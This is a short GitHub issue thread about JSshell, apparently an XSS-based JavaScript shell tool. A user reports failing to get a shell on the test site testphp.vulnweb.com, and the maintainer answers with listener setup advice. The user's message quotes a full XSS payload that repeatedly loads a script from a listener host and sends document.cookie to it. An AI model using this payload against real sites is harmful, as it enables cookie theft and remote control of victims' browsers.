### ISSUE TITLE
I could start listener but still could not get shell

### ISSUE THREAD

**Issue by khangaekata** [shelld3v/JSshell#9]
Hello Shelld3v Team,

I just want to bring following issue to your notice.
I tried on testphp.vulnweb.com
As per given in documentation I first started listener using command python3 jsh.py -g -s http://testphp.vulnweb.com.
Then I went to browser and pasted payload in link and tried to access the page. My Url became http://testphp.vulnweb.com/search.php?test=%3Csvg/onload=setInterval(function(){with(document)body.appendChild(createElement(%22script%22)).src=%22//http://testphp.vulnweb.com:4848/?%22+document.cookie},1010)%3E
web page is opened well but I could not get shell. 
Please correct me if I am doing something wrong and suggest me how should I go ahead with this .
Looking forward to hear from you. 

Best Regards,

[Ashish]

**Comment by shelld3v** [comment]
Why `-s http://testphp.vulnweb.com`? It should be `-s <YOUR_IP_ADDRESS>` (make sure you turned off the firewall)! You can try `-s 127.0.0.1` to test. Btw, there isn't any team here, just a guy making a script lonely
